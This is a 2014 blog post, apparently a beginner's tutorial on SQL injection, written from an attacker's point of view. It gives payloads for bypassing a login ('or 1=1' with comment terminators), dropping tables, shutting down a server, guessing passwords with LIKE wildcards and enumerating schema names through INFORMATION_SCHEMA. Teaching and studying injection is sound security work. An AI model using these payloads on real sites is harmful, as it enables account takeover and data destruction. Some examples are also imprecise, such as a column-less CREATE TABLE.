Wednesday, 17 December 2014

SQL Injections (toutorial)

                           SQL Injections

SQL stands for structured query language. It is a language that is used by a website to communicate with the database. The main SQL functions are simple and can be learned very quickly. For example the code 


                                      SELECT * FROM users WHERE name = ‘username’


Will select anyone in the database that has the name ‘username’. The SQL commands are usually entered in capital letters. 

PHP pages (like these) can have SQL commands built into them. However, sometimes the SQL built into them can be manipulated using SQL injections.

                                         How to do this?

Lets start with a very simple SQL injection. Say there is a table called "users" that has a field in it called UserID. Now there is a script on the site that lets you enter the UserID and the SQL will fetch the information about the person who owns the UserID. The SQL for it is as follows:  
                           
                                         SELECT * FROM `users` WHERE UserID= $ID    
     
The * means select all that match that ID. $ID is the ID that you enter into a text box on the site. Now say instead of entering a number, you enter the word UserID. This will make the SQL perform the following query:    

                                       SELECT * FROM `users` WHERE UserID= UserID

This is just like doing a 1=1 SQL injection. The UserID is always equal to itself. So the result of the SQL query would be the page showing you the user details of every single person registered to that site.

In simple terms, what you enter becomes part of the SQL query – meaning that you can type SQL commands into the site and these commands will be added to the actual SQL query.


Now lets try another SQL query. This is one of the most commonly used SQL injections that are tried on sites. If there is a login box asking for a username and password on the site (my one is protected) the username and password will be compared to all usernames and passwords stored in the database. Say the SQL is this:

                                     SELECT * FROM users WHERE username = $username;

                                    SELECT * FROM users WHERE password = $password;
$username and $password again being the usernames and passwords entered into the PHP form. Now if the following details were to be entered into the username and password boxes: 

'Username' or 1=1 

'Password' or 1=1 

The resulting SQL query is:
                             
                                            SELECT * FROM users WHERE username = 'Username' or 1=1

                                           SELECT * FROM users WHERE password = 'Password' or 1=1;

This tricks the site using the 1=1 statement at the end. There is no field called ‘1’ in the database so its basically saying if 1=1 which it always does. So the result of this SQL injection is usually the attacker being logged in as the first username on the list, which in most cases is the admin. This gives you full admin control over the site. 
String terminator

In SQL, a double dash (--)  signifies the end of the string. Adding a double dash to the end of your SQL injection basically makes anything after it a comment, thus making the webpage ignore it.

This is useful for making the server ignore the final quotation mark at the end of an SQL command. E.g. if the SQL looked like this:
SELECT * FROM `users` WHERE username=' $_POST['uname']';
(POST is the PHP command to get information from a form) entering the command above but with a double dash will solve this problem. The SQL statement would now look like this: 

SELECT * FROM `users` WHERE username=' ' or 1=1--';
because of the double dash at the end, the '; gets ignored making the query valid and again 1 is always equal to 1 so it will select the first username in the database, which is usually the Admin
The Drop / Create Commands
    The DROP command isn't really recommended. This is another method of deleting. This command can be used to delete a whole database if the SQL isn't properly sanitized. for example entering the command:

a'; DROP TABLE `users`; -- 

Into a username/password box will search the database for the username/password a then delete the whole database afterwards. However this is very malicious and usually doesn't benefit you in any way. 

The create command as predicted will create a new table in the database. For example
a'; CREATE TABLE `hello`; -- 

will create a new table in the database called hello, again though this has no use.

 
                        Shutdown

This command is also a very malicious command, some SQL servers have this command running and when the correct command is entered, it will cause the system to shutdown, taking the whole site offline temporarily. This is rarely ever successful, but for example if you entered the username:
'; shutdown with nowait; --
and left the password field when you tried to login the system would shutdown immediately.

 

                                   Wild cards




To make the chance of guessing a username or password even higher, there is also wildcards. The most popular is a % sign. This when going with a LIKE statement makes things a lot easier.

For example, does the admin's password have an 'm' in it?

 

SELECT * FROM users WHERE name='Admin' AND password LIKE '%m%'
does it start with m?

SELECT * FROM users WHERE name='Admin' AND password LIKE 'm%'
does it begin mo?
SELECT * FROM users WHERE name='Admin' AND password LIKE '%m %o%'
is the third letter an e?

SELECT * FROM users WHERE name='Admin' AND password LIKE '__e%'
This is used with the "Exists" command.



                     Finding out Info



If you don't know anything at all about the structure of the database, These 2 commands should help. For example, say you don't know the name of the database, This command will check if the name of the database contains the letter 't'
' OR EXISTS(SELECT 1 FROM dual WHERE database() LIKE '%t%') AND ''='
This will help get the database name, once you have accomplished this you will need to know the table names inside the database, To check this you use the following command: (checks if there is a table called 'users' in the database)
' OR EXISTS(SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='test' AND TABLE_NAME='users') AND ''='
Hopefully showing a positive result.
 

                             Magic Quotes




Because of the problems SQL injections can produce, A lot of sites use magic quotes. These simply add a backslash (\) to all quotation marks (‘ ") entered into the form making the SQL invalid. It can sometimes be hard to tell if a site is using magic quotes or not so try the SQL and see.

 

This is just the start of basic SQL injections. The combination of possible SQL injections to try is endless For more, check out
 Wikipedias article and research for further, for example ALTER and UNION commands. Learning SQL would also benefit you.

No comments:

Post a Comment